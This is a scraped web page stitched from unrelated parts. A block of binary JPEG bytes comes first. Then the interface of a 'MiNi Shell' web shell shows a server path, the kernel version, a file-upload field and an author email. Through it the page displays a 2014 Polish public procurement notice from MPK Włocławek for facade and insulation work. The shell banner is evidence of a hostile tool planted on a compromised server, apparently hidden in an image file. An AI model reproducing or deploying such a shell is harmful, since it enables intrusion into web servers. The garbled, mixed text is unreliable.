JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140818/273810-N-2014.html

<p class="kh_header"><b>Włocławek: Przedmiotem  zamówienia  publicznego  jest  wykonanie  robót  budowlanych  na terenie  nieruchomości  stanowiącej  własność  Miejskiego  Przedsiębiorstwa  Komunikacyjnego    Spółka  z  o. o.  we  Włocławku.</b><br>
<b>Numer ogłoszenia: 273810 - 2014; data zamieszczenia: 18.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Komunikacyjne Sp. z o.o. , ul. Rysia 3, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 2364281, faks 054 236 95 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpk.com.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mpk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ogólne usługi publiczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem  zamówienia  publicznego  jest  wykonanie  robót  budowlanych  na terenie  nieruchomości  stanowiącej  własność  Miejskiego  Przedsiębiorstwa  Komunikacyjnego    Spółka  z  o. o.  we  Włocławku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  publicznego  jest  wykonanie  robót  budowlanych  na terenie  nieruchomości  stanowiącej  własność  Miejskiego  Przedsiębiorstwa  Komunikacyjnego    Spółka  z  o. o.  we  Włocławku,  z  możliwością  składania  ofert  częściowych  na  poszczególne  zadania:

Zadanie  nr  1.	Docieplenie  ścian,  wykonanie  nowej  elewacji  i  innych  robót  budowlanych  towarzyszących   na  budynku  socjalno-administracyjnym  stacji  obsługi  pojazdów  -  segment  A  budynku.

Zadanie  nr  2.  Wykonanie  nowych  elewacji  budynku stacji  obsługi  -  elewacje  ścian  zachodniej i   wschodniej   segmentu  B  budynku..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza  możliwość  wprowadzenia  zmian  w  umowie                               w  stosunku  do  treści  oferty,  które  będą  mogły  być  dokonane                         z  powodu  zaistnienia  okoliczności niemożliwych  do  przewidzenia                                    w  chwili  zawarcia  umowy  lub  w  przypadku  wystąpienia którejkolwiek                            z  następujących  sytuacji:

2.1.	udzielenia  w  trakcie  realizacji  umowy  zamówień  dodatkowych  związanych  z  realizacją  zamówienia  podstawowego,  mających  wpływ  na   uzgodniony  termin  zlecenia  jej  realizacji powodujących  konieczność  jego   wydłużenia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający  wymaga  aby  Wykonawcy  ubiegający  się  o  udzielenie   zamówienia  publicznego  przed  wpływem  terminu  składania  ofert  wnieśli  wadium  w  wysokości :
a)	Na zadanie nr 1 -  2.000,00 zł( dwa tysiące złotych);
b)	Na zadanie nr 2 - 6.000,00 zł ( sześć tysięcy złotych ).
2)	Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach:

2.1)   pieniądzu - przelewem    na  rachunek  Zamawiającego  w  Banku  
         PKO  BP  S.A.  O/Włocławek  Nr  66 1020 5170 0000 1002 0005 
 8453.  Za  dzień  dokonania  wpłaty  przelewem  bankowym  przyjmuje się dzień uznania  rachunku  bankowego  Zamawiającego;
2.2)	poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo- kredytowej, z  tym,  że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym;
2.3)	gwarancjach  bankowych;
2.4)	gwarancjach  ubezpieczeniowych;

3)	Wadium  wniesione  przez  Wykonawców,  w  pieniądzu  przechowywane będzie  na  rachunku  bankowym  Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia  w/w  warunku  dokonywania  będzie  w  oparciu                o  złożone  przez  Wykonawcę  w  niniejszym  postępowaniu  dokumenty  oraz  oświadczenia.
Wykonawca  złoży oświadczenie  o  posiadaniu  uprawnień  do  wykonywania  robót  określonych  w  przedmiocie  zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  opisanego  przez  Zamawiającego  warunku  posiadania  przez  Wykonawcę  niezbędnej  wiedzy  i  doświadczenia,  Wykonawcy  winni  dołączyć  do  oferty  dokumenty  potwierdzające,  że  Wykonawca  w  okresie  ostatnich  3  lat  przed  upływem  terminu  składania  ofert ( a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie)  wykonał  należycie  co  najmniej  dwie  umowy  o  roboty  budowlane  o  wartości  co najmniej  0,3  mln  zł,                    z  podaniem  ich  wartości,  przedmiotu ,  daty  wykonania  i  odbiorcy,  oraz  załączeniem  dokumentów  potwierdzających,  że  umowy  te  zostały  wykonane  należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia  w/w  warunku  dokonywana  będzie  w  oparciu                  o  złożone  przez  Wykonawcę  w  niniejszym  postępowaniu  dokumenty  oraz  oświadczenia.
Wykonawca  złoży  oświadczenie  ,  że  dysponuje  odpowiednim  potencjałem  technicznym  i  kadrowym  umożliwiającym  wykonanie  przedmiotu  zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełnienia  w/w  warunku  dokonywana  będzie  w  oparciu                  o  złożone  przez  Wykonawcę  w  niniejszym  postępowaniu  dokumenty  oraz  oświadczenia.
Wykonawca  złoży  oświadczenie  ,  że  dysponuje  odpowiednim  potencjałem  technicznym  i  kadrowym  umożliwiającym  wykonanie  przedmiotu  zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  opisanego  przez  Zamawiającego  warunku  Wykonawca  przedłoży  w  tym  zakresie,  informację  banku  lub  spółdzielczej  kasy  oszczędnościowo-kredytowej,  w  których  posiada  rachunek,  potwierdzającą  wysokość  posiadanych  środków  finansowych  lub  zdolność  kredytową  Wykonawcy  na  kwotę  co  najmniej  300.000,00  PLN,  wystawioną  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej,                      w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę co najmniej 300.000,00 PLN, wystawiona nie wcześniej niż   3 miesiące przed upływem terminu składania ofert.

2)	oświadczenie  Wykonawcy  o  zapoznaniu  się  z  treścią  projektu  umowy  (zał.  nr  2  i  nr  3  do  SIWZ)  i  jej  akceptacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji na przedmiot zamówienia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza  możliwość  wprowadzenia  zmian  w  umowie               w  stosunku  do  treści  oferty,  które  będą  mogły  być  dokonane                         z  powodu  zaistnienia  okoliczności niemożliwych  do  przewidzenia                   w  chwili  zawarcia  umowy  lub  w  przypadku  wystąpienia którejkolwiek                            z  następujących  sytuacji:

2.1.	udzielenia  w  trakcie  realizacji  umowy  zamówień  dodatkowych  związanych  z  realizacją  zamówienia  podstawowego,  mających  wpływ  na   uzgodniony  termin  zlecenia  jej  realizacji powodujących  konieczność  jego   wydłużenia.

3.	Przedłużenie  terminu  zakończenia  realizacji  przedmiotu  umowy,  może  nastąpić  wyłącznie  przez  zmianę  umowy  o  udzielenie  zamówienia publicznego,  tj.  przez  aneks  do  umowy,  w  przypadkach:

3.1.	wystąpienia  okoliczności   siły  wyższej -  jako  siłę  wyższa  należy  rozumieć  zdarzenie  zewnętrzne  niezależne  od  żadnej  ze  stron,  niemożliwe  do  zapobieżenia,  które  nastąpiło  po  dniu  wejścia                      w  życie  umowy,  w  szczególności:  akty  terroryzmu,  klęski  żywiołowe,  akty  władzy  o  administracji  publicznej;

3.2.	zmiany  osób  upoważnionych  w  umowie  po  stronie  którejkolwiek  ze  stron.

4.	Zamawiający  dopuszcza  również  możliwość  wprowadzenia  zmian                   w  umowie,  w  stosunku  do  treści    oferty,  a  także  przewiduje  możliwość  rozwiązania  umowy,  z  powodu  zaistnienia  okoliczności  niemożliwych  do  przewidzenia  w  chwili  zawarcia  umowy,                                w  szczególności  ze  względu  na  zmianę  obowiązujących  w  chwili   zawierania  umowy  przepisów  prawa  regulujących  kwestie  związania         z  przedmiotem  zamówienia.

5.	Wszelkie  zmiany  umowy  wymagają  pod  rygorem  nieważności  formy  pisemnej  i  podpisania  przez  obie  strony  oraz  mogą  być  wprowadzone                w  okolicznościach  i  na  zasadach  opisanych  powyżej  wyłącznie    przed  zakończeniem  terminu  realizacji  umowy.
6.	Z wnioskiem  o  zmianę  treści  umowy  może  wystąpić  każda  ze  stron  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Komunikacyjne Spółka z o.o. we Włocławku, ul. Rysia 3 , 87-800 Włocławek..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2014 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Komunikacyjne Sp. z o.o. , ul. Rysia 3, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie  1. Docieplenie  ścian,  wykonanie  nowej elewacji  i  innych  robót  budowlanych  na budynku  administracyjno-socjalnym  stacji  obsługi  pojazdów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie  1. Docieplenie  ścian,  wykonanie  nowej elewacji  i  innych  robót  budowlanych  na budynku  administracyjno-socjalnym  stacji  obsługi  pojazdów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr  2.  .  Wykonanie  nowych  elewacji  budynku stacji  obsługi  -  elewacje  ścian  zachodniej i   wschodniej   segmentu  B  budynku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr  2.  .  Wykonanie  nowych  elewacji  budynku stacji  obsługi  -  elewacje  ścian  zachodniej i   wschodniej   segmentu  B  budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com